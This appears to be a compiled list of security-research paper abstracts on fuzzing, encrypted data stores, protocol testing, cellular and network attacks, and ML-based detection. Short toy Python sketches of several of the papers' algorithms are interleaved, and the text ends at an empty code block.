Fuzzing is one of the most effective approaches for identifying security vulnerabilities. As a state-of-the-art coverage-based greybox fuzzer, AFL is a highly effective and widely used technique. However, AFL allocates excessive energy (i.e., the number of test cases generated by the seed) to seeds that exercise high-frequency paths and cannot adaptively adjust the energy allocation, thus wasting a significant amount of energy. Moreover, the current Markov model for coverage-based greybox fuzzing does not capture the process deeply enough. This paper presents a variant of the Adversarial Multi-Armed Bandit model for modeling AFL’s power schedule process. We first explain the challenges in AFL’s scheduling algorithm in terms of the reward probability, i.e., the probability that a generated test case discovers a new path. Moreover, we characterize the three states of the seed set and develop a unique adaptive scheduling algorithm as well as a probability-based search strategy. These approaches are implemented on top of AFL in an adaptive energy-saving greybox fuzzer called EcoFuzz. EcoFuzz was examined against six other AFL-type tools on 14 real-world subjects over 490 CPU days. According to the results, EcoFuzz attained 214% of the path coverage of AFL while generating 32% fewer test cases. Besides, EcoFuzz identified 12 vulnerabilities in GNU Binutils and other software. We also extended EcoFuzz to test some IoT devices and found a new vulnerability in the SNMP component.
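To make the bandit framing concrete, here is a minimal EXP3-style scheduler where each seed is an arm and the reward is (normalized) new coverage per test case. This is the generic adversarial-bandit update, not EcoFuzz's exact algorithm:

```python
# EXP3-style energy allocation across seeds (toy rewards).
import math
import random

def exp3_schedule(seeds, run_batch, rounds=1000, gamma=0.1):
    """seeds: list of seed ids; run_batch(seed) -> reward in [0, 1]."""
    k = len(seeds)
    weights = [1.0] * k
    for _ in range(rounds):
        total = sum(weights)
        # Mix weight-proportional choice with uniform exploration.
        probs = [(1 - gamma) * w / total + gamma / k for w in weights]
        i = random.choices(range(k), weights=probs)[0]
        reward = run_batch(seeds[i])          # e.g., new edges per test case
        # Importance-weighted update: the EXP3 step.
        weights[i] *= math.exp(gamma * (reward / probs[i]) / k)
    return weights

# Toy target: seed 3 is the only one still uncovering new paths.
random.seed(0)
rewards = [0.01, 0.02, 0.01, 0.5, 0.02]
w = exp3_schedule(list(range(5)), lambda s: rewards[s] * random.random())
print([round(x, 2) for x in w])   # weight mass concentrates on seed 3
```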

MUZZ: Thread-aware Grey-box Fuzzing for Effective Bug Hunting in Multithreaded Programs

Grey-box fuzz testing has revealed thousands of vulnerabilities in real-world software owing to its lightweight instrumentation, fast coverage feedback, and dynamic adjusting strategies. However, directly applying grey-box fuzzing to input-dependent multithreaded programs can be extremely inefficient. In practice, multithreading-relevant bugs are usually buried in the sophisticated program flows. Meanwhile, existing grey-box fuzzing techniques do not stress thread-interleavings that affect execution states in multithreaded programs. Therefore, mainstream grey-box fuzzers cannot adequately test problematic segments in multithreaded software, although they might obtain high code coverage statistics.

To this end, we propose Muzz, a new grey-box fuzzing technique that hunts for bugs in multithreaded programs. Muzz features three novel thread-aware instrumentations, namely coverage-oriented instrumentation, thread-context instrumentation, and schedule-intervention instrumentation. During fuzzing, these instrumentations produce runtime feedback to accentuate execution states caused by thread interleavings. By leveraging such feedback in the dynamic seed selection and execution strategies, Muzz preserves more valuable seeds that expose bugs under a multithreading context.

We evaluate Muzz on twelve real-world multithreaded programs. Experiments show that Muzz outperforms AFL in both multithreading-relevant seed generation and concurrency-vulnerability detection. Further, by replaying the target programs against the generated seeds, Muzz also reveals more concurrency-bugs (e.g., data-races, thread-leaks) than AFL. In total, Muzz detected eight new concurrency-vulnerabilities and nineteen new concurrency-bugs. At the time of writing, four reported issues have received CVE IDs.

Data Security/Secure Computation

SEAL: Attack Mitigation for Encrypted Databases via Adjustable Leakage

Building expressive encrypted databases that can scale to large volumes of data while enjoying formal security guarantees has been one of the holy grails of security and cryptography research. Searchable Encryption (SE) is considered to be an attractive implementation choice for this goal: It naturally supports basic database queries such as point, join, group-by and range, and is very practical at the expense of well-defined leakage such as search and access pattern. Nevertheless, recent attacks have exploited these leakages to recover the plaintext database or the posed queries, casting doubt on the usefulness of SE in encrypted systems. Defenses against such leakage-abuse attacks typically require the use of Oblivious RAM or worst-case padding—such countermeasures are however quite impractical. In order to efficiently defend against leakage-abuse attacks on SE-based systems, we propose SEAL, a family of new SE schemes with adjustable leakage. In SEAL, the amount of privacy loss is expressed in leaked bits of search or access pattern and can be defined at setup. As our experiments show, when protecting only a few bits of leakage (e.g., three to four bits of access pattern), enough for existing and even new more aggressive attacks to fail, SEAL’s query execution time is within the realm of practical for real-world applications (a little over one order of magnitude slowdown compared to traditional SE-based encrypted databases). Thus, SEAL could constitute a promising approach to building efficient and robust encrypted databases.

Pancake: Frequency Smoothing for Encrypted Data Stores

We present PANCAKE, the first system to protect key-value stores from access pattern leakage attacks with small constant factor bandwidth overhead. PANCAKE uses a new approach, that we call frequency smoothing, to transform plaintext accesses into uniformly distributed encrypted accesses to an encrypted data store. We show that frequency smoothing prevents access pattern leakage attacks by passive persistent adversaries in a new formal security model. We integrate PANCAKE into three key-value stores used in production clusters, and demonstrate its practicality: on standard benchmarks, PANCAKE achieves 229× better throughput than non-recursive Path ORAM — within 3–6× of insecure baselines for these key-value stores.
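Frequency smoothing is easy to see in a toy simulation: replicate hot keys so each replica carries roughly the same access probability, then pad with fake uniform accesses; what the server observes flattens toward uniform. The numbers and the replication rule below are simplified for illustration:

```python
# Toy frequency smoothing: skewed plaintext accesses -> ~uniform physical ones.
import random
from collections import Counter

plaintext_freq = {"hot": 0.6, "warm": 0.3, "cold": 0.1}  # known/estimated
alpha = 0.1  # smallest key frequency; each replica carries ~alpha

# Replicate each key so every replica carries about alpha of its probability.
replicas = {k: max(1, round(p / alpha)) for k, p in plaintext_freq.items()}
physical_keys = [f"{k}#{i}" for k, r in replicas.items() for i in range(r)]

def smoothed_access(real_key=None):
    """Physical key the server observes for one (real or fake) access."""
    if real_key is None:                       # fake access: uniform choice
        return random.choice(physical_keys)
    i = random.randrange(replicas[real_key])   # real access: random replica
    return f"{real_key}#{i}"

# Half the accesses are real (drawn from the skewed workload), half are
# fake padding; padding matters when replication alone cannot equalize
# the per-replica probabilities exactly.
random.seed(1)
keys, probs = zip(*plaintext_freq.items())
obs = Counter()
for _ in range(100_000):
    if random.random() < 0.5:
        obs[smoothed_access(random.choices(keys, weights=probs)[0])] += 1
    else:
        obs[smoothed_access()] += 1
print({k: round(v / 100_000, 3) for k, v in sorted(obs.items())})  # ~0.1 each
```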

Droplet: Decentralized Authorization and Access Control for Encrypted Data Streams

This paper presents Droplet, a decentralized data access control service. Droplet enables data owners to securely and selectively share their encrypted data while guaranteeing data confidentiality in the presence of unauthorized parties and compromised data servers. Droplet’s contribution lies in coupling two key ideas: (i) a cryptographically-enforced access control construction for encrypted data streams which enables users to define fine-grained stream-specific access policies, and (ii) a decentralized authorization service that serves user-defined access policies. In this paper, we present Droplet’s design, the reference implementation of Droplet, and the experimental results of three case-study applications deployed with Droplet: Fitbit activity tracker, Ava health tracker, and ECOviz smart meter dashboard, demonstrating Droplet’s applicability for secure sharing of IoT streams.

Secure parallel computation on national scale volumes of data

We revisit the problem of performing secure computation of graph-parallel algorithms, focusing on the applications of securely outsourcing matrix factorization, and histograms. Leveraging recent results in low-communication secure multi-party computation, and a security relaxation that allows the computation servers to learn some differentially private leakage about user inputs, we construct a new protocol that reduces overall runtime by 320X, reduces the number of AES calls by 750X, and reduces the total communication by 200X. Our system can securely compute histograms over 300 million items in about 4 minutes, and it can perform sparse matrix factorization, which is commonly used in recommendation systems, on 20 million records in about 6 minutes. Furthermore, in contrast to prior work, our system is secure against a malicious adversary that corrupts one of the computing servers.

Delphi: A Cryptographic Inference Service for Neural Networks

Many companies provide neural network prediction services to users for a wide range of applications. However, current prediction systems compromise one party’s privacy: either the user has to send sensitive inputs to the service provider for classification, or the service provider must store its proprietary neural networks on the user’s device. The former harms the personal privacy of the user, while the latter reveals the service provider’s proprietary model.

We design, implement, and evaluate Delphi, a secure prediction system that allows two parties to run a neural network inference without revealing either party’s data. Delphi approaches the problem by simultaneously co-designing cryptography and machine learning. We first design a hybrid cryptographic protocol that improves upon the communication and computation costs over prior work. Second, we develop a planner that automatically generates neural network architecture configurations that navigate the performance-accuracy trade-offs of our hybrid protocol. Together, these techniques allow us to achieve a 22x improvement in prediction latency compared to the state-of-the-art prior work.

Fuzzing 2

Analysis of DTLS Implementations Using Protocol State Fuzzing

Recent years have witnessed an increasing number of protocols relying on UDP. Compared to TCP, UDP offers performance advantages such as simplicity and lower latency. This has motivated its adoption in Voice over IP, tunneling technologies, IoT, and novel Web protocols. To protect sensitive data exchange in these scenarios, the DTLS protocol has been developed as a cryptographic variation of TLS. DTLS’s main challenge is to support the stateless and unreliable transport of UDP. This has forced protocol designers to make choices that affect the complexity of DTLS, and to incorporate features that need not be addressed in the numerous TLS analyses.

We present the first comprehensive analysis of DTLS implementations using protocol state fuzzing. To that end, we extend TLS-Attacker, an open source framework for analyzing TLS implementations, with support for DTLS tailored to the stateless and unreliable nature of the underlying UDP layer. We build a framework for applying protocol state fuzzing on DTLS servers, and use it to learn state machine models for thirteen DTLS implementations. Analysis of the learned state models reveals four serious security vulnerabilities, including a full client authentication bypass in the latest JSSE version, as well as several functional bugs and non-conformance issues. It also uncovers considerable differences between the models, confirming the complexity of DTLS state machines.

Agamotto: Accelerating Kernel Driver Fuzzing with Lightweight Virtual Machine Checkpoints

Kernel-mode drivers are challenging to analyze for vulnerabilities, yet play a critical role in maintaining the security of OS kernels. Their wide attack surface, exposed via both the system call interface and the peripheral interface, is often found to be the most direct attack vector to compromise an OS kernel. Researchers therefore have proposed many fuzzing techniques to find vulnerabilities in kernel drivers. However, the performance of kernel fuzzers is still lacking, for reasons such as prolonged execution of kernel code, interference between test inputs, and kernel crashes.

This paper proposes lightweight virtual machine checkpointing as a new primitive that enables high-throughput kernel driver fuzzing. Our key insight is that kernel driver fuzzers frequently execute similar test cases in a row, and that their performance can be improved by dynamically creating multiple checkpoints while executing test cases and skipping parts of test cases using the created checkpoints. We built a system, dubbed Agamotto, around the virtual machine checkpointing primitive and evaluated it by fuzzing the peripheral attack surface of USB and PCI drivers in Linux. The results are convincing. Agamotto improved the performance of the state-of-the-art kernel fuzzer, Syzkaller, by 66.6% on average in fuzzing 8 USB drivers, and an AFL-based PCI fuzzer by 21.6% in fuzzing 4 PCI drivers, without modifying their underlying input generation algorithm.

USBFuzz: A Framework for Fuzzing USB Drivers by Device Emulation

The Universal Serial Bus (USB) connects external devices to a host. This interface exposes the OS kernels and device drivers to attacks by malicious devices. Unfortunately, kernels and drivers were developed under a security model that implicitly trusts connected devices. Drivers expect faulty hardware but not malicious attacks. Similarly, security testing of drivers is challenging as input must cross the hardware/software barrier. Fuzzing, the most widely used bug finding technique, relies on providing random data to programs. However, fuzzing device drivers is challenging due to the difficulty in crossing the hardware/software barrier and providing random device data to the driver under test.

We present USBFuzz, a portable, flexible, and modular framework for fuzz testing USB drivers. At its core, USBFuzz uses a software-emulated USB device to provide random device data to drivers (when they perform IO operations). As the emulated USB device works at the device level, porting it to other platforms is straight-forward. Using the USBFuzz framework, we apply (i) coverage-guided fuzzing to a broad range of USB drivers in the Linux kernel; (ii) dumb fuzzing in FreeBSD, MacOS, and Windows through cross pollination seeded by the Linux inputs; and (iii) focused fuzzing of a USB webcam driver. USBFuzz discovered a total of 26 new bugs, including 16 memory bugs of high security impact in various Linux subsystems (USB core, USB sound, and network), one bug in FreeBSD, three in MacOS (two resulting in an unplanned reboot and one freezing the system), and four in Windows 8 and Windows 10 (resulting in Blue Screens of Death), and one bug in the Linux USB host controller driver and another one in a USB camera driver. From the Linux bugs, we have fixed and upstreamed 11 bugs and received 10 CVEs.

GREYONE: Data Flow Sensitive Fuzzing

Data flow analysis (e.g., dynamic taint analysis) has proven to be useful for guiding fuzzers to explore hard-to-reach code and find vulnerabilities. However, traditional taint analysis is labor-intensive, inaccurate and slow, affecting the fuzzing efficiency. Apart from taint, few data flow features are utilized.

In this paper, we propose a data flow sensitive fuzzing solution, GREYONE. We first utilize the classic feature, taint, to guide fuzzing. A lightweight and sound fuzzing-driven taint inference (FTI) is adopted to infer the taint of variables, by monitoring their value changes while mutating input bytes during fuzzing. With the taint, we propose a novel input prioritization model to determine which branch to explore, which bytes to mutate and how to mutate. Further, we use another data flow feature, constraint conformance, i.e., the distance of tainted variables to the values expected in untouched branches, to tune the evolution direction of fuzzing.

We implemented a prototype of GREYONE and evaluated it on the LAVA data set and 19 real world programs. The results showed that it outperforms various state-of-the-art fuzzers in terms of both code coverage and vulnerability discovery. In the LAVA data set, GREYONE found all listed bugs and 336 more unlisted. In real world programs, GREYONE on average found 2.12X as many unique program paths and 3.09X as many unique bugs as state-of-the-art evolutionary fuzzers, including AFL, VUzzer, CollAFL, Angora and Honggfuzz. Moreover, GREYONE on average found 1.2X as many unique program paths and 1.52X as many unique bugs as QSYM, a state-of-the-art symbolic execution assisted fuzzer. In total, it found 105 new security bugs, of which 41 are confirmed by CVE.
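The FTI step (infer taint by watching variable values change under byte-level mutation) can be sketched in a few lines against a toy target; real FTI hooks the variables that appear in branch conditions:

```python
# Toy fuzzing-driven taint inference: flip one byte at a time and mark a
# variable as tainted by byte i if its observed value changes.
def program_vars(data):
    # Toy instrumented target exposing the variables used in its branches.
    return {
        "x": data[0] ^ data[1],    # depends on bytes 0 and 1
        "y": data[2] * 3 & 0xFF,   # depends on byte 2
        "z": 7,                    # constant: no taint
    }

def infer_taint(data):
    baseline = program_vars(data)
    taint = {var: set() for var in baseline}
    for i in range(len(data)):
        mutated = bytearray(data)
        mutated[i] ^= 0xFF         # flip one input byte
        for var, value in program_vars(bytes(mutated)).items():
            if value != baseline[var]:
                taint[var].add(i)  # byte i flows into var
    return taint

print(infer_taint(b"\x10\x22\x05\x00"))
# {'x': {0, 1}, 'y': {2}, 'z': set()}
```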

Fuzzing Error Handling Code using Context-Sensitive Software Fault Injection

Error handling code is often critical but difficult to test in reality. As a result, many hard-to-find bugs exist in error handling code and may cause serious security problems once triggered. Fuzzing has become a widely used technique for finding software bugs nowadays. Fuzzing approaches mutate and/or generate various inputs to cover infrequently-executed code. However, existing fuzzing approaches are very limited in testing error handling code, because some of this code can be only triggered by occasional errors (such as insufficient memory and network-connection failures), but not specific inputs. Therefore, existing fuzzing approaches in general cannot effectively test such error handling code.

In this paper, we propose a new fuzzing framework named FIFUZZ, to effectively test error handling code and detect bugs. The core of FIFUZZ is a context-sensitive software fault injection (SFI) approach, which can effectively cover error handling code in different calling contexts to find deep bugs hidden in error handling code with complicated contexts. We have implemented FIFUZZ and evaluated it on 9 widely-used C programs. It reports 317 alerts which are caused by 50 unique bugs in terms of the root causes. 32 of these bugs have been confirmed by related developers. We also compare FIFUZZ to existing fuzzing tools (including AFL, AFLFast, AFLSmart and FairFuzz), and find that FIFUZZ finds many bugs missed by these tools. We believe that FIFUZZ can effectively augment existing fuzzing approaches to find many real bugs that have been otherwise missed.
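The context-sensitive part is the key difference from plain fault injection: the same error site is failed only under a chosen call chain, so each handler is exercised in isolation. A toy sketch with illustrative names:

```python
# Context-sensitive fault injection: fail an error site per calling context.
import traceback

fail_contexts = set()   # contexts the driver currently fails
seen_contexts = set()   # contexts observed during a profiling run

def current_context():
    # Identify an error site by its call chain, not just its location.
    return tuple(f.name for f in traceback.extract_stack()[:-2])

def maybe_faulty_alloc(size):
    ctx = current_context()
    seen_contexts.add(ctx)
    if ctx in fail_contexts:
        return None      # injected failure, only in this calling context
    return bytearray(size)

def parse_header():
    buf = maybe_faulty_alloc(64)
    return "header alloc failed: handled" if buf is None else "header ok"

def parse_body():
    buf = maybe_faulty_alloc(4096)
    return "body alloc failed: handled" if buf is None else "body ok"

# Profiling run records each allocation's context...
parse_header(); parse_body()
# ...then the driver fails one context at a time, covering each
# error-handling path separately (combinations would follow).
for ctx in sorted(seen_contexts):
    fail_contexts = {ctx}
    print(ctx, "->", parse_header(), "/", parse_body())
```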

Montage: A Neural Network Language Model-Guided JavaScript Engine Fuzzer

JavaScript (JS) engine vulnerabilities pose significant security threats affecting billions of web browsers. While fuzzing is a prevalent technique for finding such vulnerabilities, there have been few studies that leverage the recent advances in neural network language models (NNLMs). In this paper, we present Montage, the first NNLM-guided fuzzer for finding JS engine vulnerabilities. The key aspect of our technique is to transform a JS abstract syntax tree (AST) into a sequence of AST subtrees that can directly train prevailing NNLMs. We demonstrate that Montage is capable of generating valid JS tests, and show that it outperforms previous studies in terms of finding vulnerabilities. Montage found 37 real-world bugs, including three CVEs, in the latest JS engines, demonstrating its efficacy in finding JS engine bugs.
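Montage's key preprocessing step is the AST-to-fragment-sequence transformation. A sketch using Python's own ast module as a stand-in parser (the paper itself fragments JavaScript ASTs):

```python
# Serialize an AST into a sequence of depth-1 subtree "fragments",
# the kind of unit a language model can be trained on.
import ast

def fragmentize(node):
    """Emit one fragment per node: its type plus its children's types."""
    children = tuple(type(c).__name__ for c in ast.iter_child_nodes(node))
    yield (type(node).__name__, children)
    for child in ast.iter_child_nodes(node):
        yield from fragmentize(child)

code = "x = foo(1) + bar(y)"
for fragment in list(fragmentize(ast.parse(code)))[:5]:
    print(fragment)
# An NNLM is trained to predict the next fragment in such sequences;
# generation then reassembles predicted fragments into a new, valid tree.
```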

NDSS

2018 programme dblp

Session 1B: Attacks and Vulnerabilities

Didn’t You Hear Me? – Towards More Successful Web Vulnerability Notifications

After treating the notification of vulnerable parties as mere side-notes in research, the security community has recently put more focus on how to conduct vulnerability disclosure at scale. The first works in this area have shown that while notifications are helpful to a significant fraction of operators, the vast majority of systems remain unpatched. In this paper, we build on these previous works, aiming to understand why the effects are not more significant. To that end, we report on a notification experiment targeting more than 24,000 domains, which allowed us to analyze what technical and human aspects are roadblocks to a successful campaign. As part of this experiment, we explored potential alternative notification channels beyond email, including social media and phone. In addition, we conducted an anonymous survey with the notified operators, investigating their perspectives on our notifications. We show the pitfalls of email-based communications, such as the impact of anti-spam filters, the lack of trust by recipients, and the hesitation in fixing vulnerabilities despite awareness. However, our exploration of alternative communication channels did not suggest a more promising medium. Seeing these results, we pinpoint future directions in improving security notifications.

Exposing Congestion Attack on Emerging Connected Vehicle based Traffic Signal

Connected vehicle (CV) technology will soon transform today’s transportation systems by connecting vehicles and the transportation infrastructure through wireless communication. Having demonstrated the potential to greatly improve transportation mobility efficiency, such dramatically increased connectivity also opens a new door for cyber attacks. In this work, we perform the first detailed security analysis of the next-generation CV-based transportation systems. As a first step, we target the USDOT (U.S. Department of Transportation) sponsored CV-based traffic control system, which has been tested and shown high effectiveness in real road intersections. In the analysis, we target a realistic threat, namely CV data spoofing from one single attack vehicle, with the attack goal of creating traffic congestion. We first analyze the system design and identify data spoofing strategies that can potentially influence the traffic control. Based on the strategies, we perform vulnerability analysis by exhaustively trying all the data spoofing options for these strategies to understand the upper bound of the attack effectiveness. For the highly effective cases, we analyze the causes and find that the current signal control algorithm design and implementation choices are highly vulnerable to data spoofing attacks from even a single attack vehicle. These vulnerabilities can be exploited to completely reverse the benefit of the CV-based signal control system by causing the traffic mobility to be 23.4% worse than that without adopting such system. We then construct practical exploits and evaluate them under real-world intersection settings. The evaluation results are consistent with our vulnerability analysis, and we find that the attacks can even cause a blocking effect to jam an entire approach. In the jamming period, 22% of the vehicles need to spend over 7 minutes for an original half-minute trip, which is 14 times higher. We also discuss defense directions leveraging the insights from our analysis.

Removing Secrets from Android’s TLS

Cryptographic libraries that implement Transport Layer Security (TLS) have a responsibility to delete cryptographic keys once they’re no longer in use. Any key that’s left in memory can potentially be recovered through the actions of an attacker, up to and including the physical capture and forensic analysis of a device’s memory. This paper describes an analysis of the TLS library stack used in recent Android distributions, combining a C language core (BoringSSL) with multiple layers of Java code (Conscrypt, OkHttp, and Java Secure Sockets). We first conducted a black-box analysis of virtual machine images, allowing us to discover keys that might remain recoverable. After identifying several such keys, we subsequently pinpointed undesirable interactions across these layers, where the higher-level use of BoringSSL’s reference counting features, from Java code, prevented BoringSSL from cleaning up its keys. This interaction poses a threat to all Android applications built on standard HTTPS libraries, exposing master secrets to memory disclosure attacks. We found all versions we investigated from Android 4 to the latest Android 8 are vulnerable, showing that this problem has been long overlooked. The Android Chrome application is proven to be particularly problematic. We suggest modest changes to the Android codebase to mitigate these issues, and have reported these to Google to help them patch the vulnerability in future Android systems.

rtCaptcha: A Real-Time CAPTCHA Based Liveness Detection System

Facial/voice-based authentication is becoming increasingly popular (e.g., already adopted by MasterCard and AliPay), because it is easy to use. In particular, users can now authenticate themselves to online services by using their mobile phone to show themselves performing simple tasks like blinking or smiling in front of its built-in camera. Our study shows that many of the publicly available facial/voice recognition services (e.g. Microsoft Cognitive Services or Amazon Rekognition) are vulnerable to even the most primitive attacks. Furthermore, recent work on modeling a person’s face/voice (e.g. Face2Face [1]) allows an adversary to create very authentic video/audio of any target victim to impersonate that target. All it takes to launch such attacks are a few pictures and voice samples of a victim, which can all be obtained by either abusing the camera and microphone of the victim’s phone, or through the victim’s social media account. In this work, we propose the Real Time Captcha (rtCaptcha) system, which stops/slows down such an attack by turning the adversary’s task from creating authentic video/audio of the target victim performing known authentication tasks (e.g., smile, blink) to figuring out what is the authentication task, which is encoded as a Captcha. Specifically, when a user tries to authenticate using rtCaptcha, they will be presented a Captcha and will be asked to take a “selfie” video while announcing the answer to the Captcha. As such, the security guarantee of our system comes from the strength of Captcha, and not how well we can distinguish real faces/voices from synthesized ones. To demonstrate the usability and security of rtCaptcha, we conducted a user study to measure human response times to the most popular Captcha schemes. Our experiments show that, thanks to the humans’ speed of solving Captchas, adversaries will have to solve Captchas in less than 2 seconds in order to appear live/human and defeat rtCaptcha, which is not possible for the best settings on the attack side.

Session 2A: Network Security/Cellular Networks

Automated Attack Discovery in TCP Congestion Control Using a Model-guided Approach

One of the most important goals of TCP is to ensure fairness and prevent congestion collapse by implementing congestion control. Various attacks against TCP congestion control have been reported over the years, most of which have been discovered through manual analysis. In this paper, we propose an automated method that combines the generality of implementation-agnostic fuzzing with the precision of runtime analysis to find attacks against implementations of TCP congestion control. It uses a model-guided approach to generate abstract attack strategies, by leveraging a state machine model of TCP congestion control to find vulnerable state machine paths that an attacker could exploit to increase or decrease the throughput of a connection to his advantage. These abstract strategies are then mapped to concrete attack strategies, which consist of sequences of actions such as injection or modification of acknowledgements and a logical time for injection. We design and implement a virtualized platform, TCPWN, that consists of a proxy-based attack injector and a TCP congestion control state tracker that uses only network traffic to create and inject these concrete attack strategies. We evaluated 5 TCP implementations from 4 Linux distributions and Windows 8.1. Overall, we found 11 classes of attacks, of which 8 are new.

Preventing (Network) Time Travel with Chronos

The Network Time Protocol (NTP) synchronizes time across computer systems over the Internet. Unfortunately, NTP is highly vulnerable to “time shifting attacks”, in which the attacker’s goal is to shift forward/backward the local time at an NTP client. NTP’s security vulnerabilities have severe implications for time-sensitive applications and for security mechanisms, including TLS certificates, DNS and DNSSEC, RPKI, Kerberos, BitCoin, and beyond. While technically NTP supports cryptographic authentication, it is very rarely used in practice and, worse yet, time-shifting attacks on NTP are possible even if all NTP communications are encrypted and authenticated. We present Chronos, a new NTP client that achieves good synchronization even in the presence of powerful attackers who are in direct control of a large number of NTP servers. Importantly, Chronos is backwards compatible with legacy NTP and involves no changes whatsoever to NTP servers. Chronos leverages ideas from the distributed computing literature on clock synchronization in the presence of adversarial (Byzantine) behavior. A Chronos client iteratively “crowdsources” time queries across multiple NTP servers and applies a provably secure algorithm for eliminating “suspicious” responses and averaging over the remaining responses. Chronos is carefully engineered to minimize communication overhead so as to avoid overloading NTP servers. We evaluate Chronos’ security and network efficiency guarantees via a combination of theoretical analyses and experiments with a prototype implementation. Our results indicate that to succeed in shifting time at a Chronos client by over 100ms from the UTC, even a powerful man-in-the-middle attacker requires over 20 years of effort in expectation.
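The client's core loop, as the abstract describes it, is sample, trim, average. A simplified sketch follows; the trimming fraction and agreement threshold here are illustrative, not the paper's provably secure parameters:

```python
# Chronos-flavored robust time aggregation over many NTP samples.
import random
import statistics

def chronos_estimate(samples, d=0.025):
    """samples: clock offsets (seconds) measured against many servers.
    Drop the bottom and top thirds, then accept the average only if the
    surviving samples agree with each other (within 2*d)."""
    s = sorted(samples)
    k = len(s) // 3
    trimmed = s[k:len(s) - k]            # discard the extreme thirds
    if max(trimmed) - min(trimmed) > 2 * d:
        raise ValueError("servers disagree: re-sample / fall back")
    return statistics.mean(trimmed)

random.seed(7)
honest = [random.gauss(0.001, 0.005) for _ in range(10)]  # near true offset
malicious = [3600.0] * 5                                  # 1-hour time shift
print(f"estimate: {chronos_estimate(honest + malicious):+.4f} s")
```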

LTEInspector: A Systematic Approach for Adversarial Testing of 4G LTE

In this paper, we investigate the security and privacy of the three critical procedures of the 4G LTE protocol (i.e., attach, detach, and paging), and in the process, uncover potential design flaws of the protocol and unsafe practices employed by the stakeholders. For exposing vulnerabilities, we propose a model-based testing approach LTEInspector which lazily combines a symbolic model checker and a cryptographic protocol verifier in the symbolic attacker model. Using LTEInspector, we have uncovered 10 new attacks along with 9 prior attacks, categorized into three abstract classes (i.e., security, user privacy, and disruption of service), in the three procedures of 4G LTE. Notable among our findings is the authentication relay attack that enables an adversary to spoof the location of a legitimate user to the core network without possessing appropriate credentials. To ensure that the exposed attacks pose real threats and are indeed realizable in practice, we have validated 8 of the 10 new attacks and their accompanying adversarial assumptions through experimentation in a real testbed.

GUTI Reallocation Demystified: Cellular Location Tracking with Changing Temporary Identifier

To keep subscribers’ identity confidential, a cellular network operator must use a temporary identifier instead of a permanent one according to the 3GPP standard. Temporary identifiers include Temporary Mobile Subscriber Identity (TMSI) and Globally Unique Temporary Identifier (GUTI) for GSM/3G and Long-Term Evolution (LTE) networks, respectively. Unfortunately, recent studies have shown that carriers fail to protect subscribers in both GSM/3G and LTE mainly because these identifiers have static and persistent values. These identifiers can be used to track subscribers’ locations. These studies have suggested that temporary identifiers must be reallocated frequently to solve this privacy problem. The only mechanism to update the temporary identifier in current LTE implementations is called GUTI reallocation. We investigate whether the current implementation of the GUTI reallocation mechanism can provide enough security to protect subscribers’ privacy. To do this, we collect data by performing GUTI reallocation more than 30,000 times with 28 carriers across 11 countries using 78 SIM cards. Then, we investigate whether (1) these reallocated GUTIs in each carrier show noticeable patterns and (2) if they do, these patterns are consistent among different SIM cards within each carrier. Among 28 carriers, 19 carriers have easily predictable and consistent patterns in their GUTI reallocation mechanisms. Among the remaining 9 carriers, we revisit 4 carriers to investigate them in greater detail. For all these 4 carriers, we could find interesting yet predictable patterns after invoking GUTI reallocation multiple times within a short time period. By using this predictability, we show that an adversary can track subscribers’ location as in previous studies. Finally, we present a lightweight and unpredictable GUTI reallocation mechanism as a solution.

Session 3A: Deep Learning and Adversarial ML

Automated Website Fingerprinting through Deep Learning

Several studies have shown that the network traffic that is generated by a visit to a website over Tor reveals information specific to the website through the timing and sizes of network packets. By capturing traffic traces between users and their Tor entry guard, a network eavesdropper can leverage this meta-data to reveal which website Tor users are visiting. The success of such attacks heavily depends on the particular set of traffic features that are used to construct the fingerprint. Typically, these features are manually engineered and, as such, any change introduced to the Tor network can render these carefully constructed features ineffective. In this paper, we show that an adversary can automate the feature engineering process, and thus automatically deanonymize Tor traffic by applying our novel method based on deep learning. We collect a dataset comprised of more than three million network traces, which is the largest dataset of web traffic ever used for website fingerprinting, and find that the performance achieved by our deep learning approaches is comparable to known methods which include various research efforts spanning over multiple years. The obtained success rate exceeds 96% for a closed world of 100 websites and 94% for our biggest closed world of 900 classes. In our open world evaluation, the most performant deep learning model is 2% more accurate than the state-of-the-art attack. Furthermore, we show that the implicit features automatically learned by our approach are far more resilient to dynamic changes of web content over time. We conclude that the ability to automatically construct the most relevant traffic features and perform accurate traffic recognition makes our deep learning based approach an efficient, flexible and robust technique for website fingerprinting.

VulDeePecker: A Deep Learning-Based System for Vulnerability Detection

The automatic detection of software vulnerabilities is an important research problem. However, existing solutions to this problem rely on human experts to define features and often miss many vulnerabilities (i.e., incurring high false negative rate). In this paper, we initiate the study of using deep learning-based vulnerability detection to relieve human experts from the tedious and subjective task of manually defining features. Since deep learning is motivated to deal with problems that are very different from the problem of vulnerability detection, we need some guiding principles for applying deep learning to vulnerability detection. In particular, we need to find representations of software programs that are suitable for deep learning. For this purpose, we propose using code gadgets to represent programs and then transform them into vectors, where a code gadget is a number of (not necessarily consecutive) lines of code that are semantically related to each other. This leads to the design and implementation of a deep learning-based vulnerability detection system, called Vulnerability Deep Pecker (VulDeePecker). In order to evaluate VulDeePecker, we present the first vulnerability dataset for deep learning approaches. Experimental results show that VulDeePecker can achieve much fewer false negatives (with reasonable false positives) than other approaches. We further apply VulDeePecker to 3 software products (namely Xen, Seamonkey, and Libav) and detect 4 vulnerabilities, which are not reported in the National Vulnerability Database but were “silently” patched by the vendors when releasing later versions of these products; in contrast, these vulnerabilities are almost entirely missed by the other vulnerability detection systems we experimented with.

Kitsune: An Ensemble of Autoencoders for Online Network Intrusion Detection

Neural networks have become an increasingly popular solution for network intrusion detection systems (NIDS). Their capability of learning complex patterns and behaviors makes them a suitable solution for differentiating between normal traffic and network attacks. However, a drawback of neural networks is the amount of resources needed to train them. Many network gateway and router devices, which could potentially host an NIDS, simply do not have the memory or processing power to train and sometimes even execute such models. More importantly, the existing neural network solutions are trained in a supervised manner, meaning that an expert must label the network traffic and update the model manually from time to time. In this paper, we present Kitsune: a plug and play NIDS which can learn to detect attacks on the local network, without supervision, and in an efficient online manner. Kitsune’s core algorithm (KitNET) uses an ensemble of neural networks called autoencoders to collectively differentiate between normal and abnormal traffic patterns. KitNET is supported by a feature extraction framework which efficiently tracks the patterns of every network channel. Our evaluations show that Kitsune can detect various attacks with a performance comparable to offline anomaly detectors, even on a Raspberry PI. This demonstrates that Kitsune can be a practical and economic NIDS.
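The detection principle is reconstruction error as anomaly score: learn to reconstruct normal traffic features, and flag inputs the model reconstructs poorly. A minimal stand-in uses a linear autoencoder (PCA) in place of KitNET's ensemble of small neural autoencoders:

```python
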